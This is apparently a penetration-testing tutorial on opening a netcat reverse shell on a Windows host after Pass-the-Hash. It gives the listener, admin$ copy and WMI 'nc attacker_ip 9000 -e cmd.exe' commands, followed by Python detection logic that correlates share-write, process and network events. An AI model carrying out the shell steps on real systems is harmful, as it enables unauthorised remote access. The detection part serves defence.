In a previous article, we have seen how to perform lateral movement through "Pass The Hash".
Let's imagine that there is no RDP server available on the target, but you still need to get a shell on it.
Let's use a reverse shell, i.e. the target will connect back to us (the attacker).
This is also useful if the firewall on the target allows only outbound connections.
1. Set up a listener with netcat on the attacker host
nc -L -vv -p 9000
2. Copy the file to the target host (remember, you are using a PtH shell with proper logon details).
copy nc.exe \\target\admin$
3. Execute netcat on the target host
NTHASH-win64.exe /runwmi /server:target /binary:nc attacker_ip 9000 -e cmd.exe
At this point, a shell will pop up in your listening netcat.
Try a simple whoami for fun.
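From the defender's side, the three steps above leave a distinctive trail on the target: an executable written to an administrative share over SMB, a process spawned by the WMI provider host with a "-e cmd.exe" style argument, and an outbound connection from that freshly dropped binary. The following detection logic is an added example and not part of the original article or of the tools it mentions. The event records it processes are constructed to mimic the fields of Windows Security events 5145 (share object access) and 4688 (process creation) and Sysmon event 3 (network connection); the field names and the 10-minute staging window are assumptions, not a specific SIEM schema.

```python
import re
from datetime import datetime, timedelta

# Administrative shares commonly used to drop a binary before remote execution.
ADMIN_SHARES = ("ADMIN$", "C$")
# netcat-style "-e <shell>": the process hands its stdin/stdout to a shell.
SHELL_EXEC_ARG = re.compile(r"(?:^|\s)-e\s+(?:cmd|powershell)(?:\.exe)?\b", re.I)
# Assumption: a binary run within this long after being copied is "staged".
STAGING_WINDOW = timedelta(minutes=10)


def _ts(ev):
    return datetime.fromisoformat(ev["Time"])


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return alerts (dicts with rule/host/detail) for a stream of event records."""
    alerts = []
    staged = {}  # (host, exe basename) -> time it was written to an admin share

    for ev in sorted(events, key=_ts):
        host, eid = ev["Computer"], ev["EventID"]

        # Rule 1: an .exe written to ADMIN$ or C$ over SMB (Security 5145).
        if eid == 5145:
            share = ev.get("ShareName", "").upper()
            target = ev.get("RelativeTargetName", "")
            if (share.endswith(ADMIN_SHARES) and target.lower().endswith(".exe")
                    and "WriteData" in ev.get("Accesses", "")):
                staged[(host, _basename(target))] = _ts(ev)
                alerts.append({"rule": "exe_written_to_admin_share", "host": host,
                               "detail": f"{target} written to {share} from {ev.get('IpAddress')}"})

        # Rule 2/3: process creation (Security 4688) carrying a "-e <shell>"
        # argument, or spawned by the WMI provider host (remote WMI execution).
        elif eid == 4688:
            cmd = ev.get("CommandLine", "")
            image = _basename(ev.get("NewProcessName", ""))
            parent = _basename(ev.get("ParentProcessName", ""))
            if SHELL_EXEC_ARG.search(cmd):
                alerts.append({"rule": "shell_exec_argument", "host": host, "detail": cmd})
            if parent == "wmiprvse.exe":
                alerts.append({"rule": "wmi_spawned_process", "host": host, "detail": cmd})
            # Rule 4: the binary copied to the admin share is run shortly afterwards.
            t0 = staged.get((host, image))
            if t0 is not None and _ts(ev) - t0 <= STAGING_WINDOW:
                delay = int((_ts(ev) - t0).total_seconds())
                alerts.append({"rule": "staged_binary_executed", "host": host,
                               "detail": f"{image} executed {delay}s after staging"})

        # Rule 5: the staged binary opens an outbound connection (Sysmon 3).
        elif eid == 3:
            image = _basename(ev.get("Image", ""))
            if (host, image) in staged:
                alerts.append({"rule": "staged_binary_outbound", "host": host,
                               "detail": f"{image} -> {ev.get('DestinationIp')}:{ev.get('DestinationPort')}"})
    return alerts


# Constructed sample events: the pattern from the article, plus benign noise.
SAMPLE_EVENTS = [
    {"Time": "2024-05-01T10:00:00", "EventID": 5145, "Computer": "target",
     "ShareName": "\\\\*\\ADMIN$", "RelativeTargetName": "nc.exe",
     "Accesses": "WriteData (or AddFile)", "IpAddress": "10.0.0.5"},
    {"Time": "2024-05-01T10:00:30", "EventID": 4688, "Computer": "target",
     "NewProcessName": "C:\\Windows\\nc.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "nc 10.0.0.5 9000 -e cmd.exe"},
    {"Time": "2024-05-01T10:00:31", "EventID": 3, "Computer": "target",
     "Image": "C:\\Windows\\nc.exe", "DestinationIp": "10.0.0.5", "DestinationPort": 9000},
    {"Time": "2024-05-01T10:05:00", "EventID": 4688, "Computer": "target",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "ParentProcessName": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
    {"Time": "2024-05-01T10:06:00", "EventID": 5145, "Computer": "target",
     "ShareName": "\\\\*\\Users", "RelativeTargetName": "bob\\report.docx",
     "Accesses": "ReadData (or ListDirectory)", "IpAddress": "10.0.0.7"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['host']}: {a['detail']}")
```

Each rule on its own is noisy in a real estate (admins legitimately copy tools to ADMIN$, and WmiPrvSE.exe spawns processes during normal management), which is why the correlation rules that tie the written binary to its later execution and its outbound connection carry the most weight; the individual rules are kept so an analyst can see the chain build up in order.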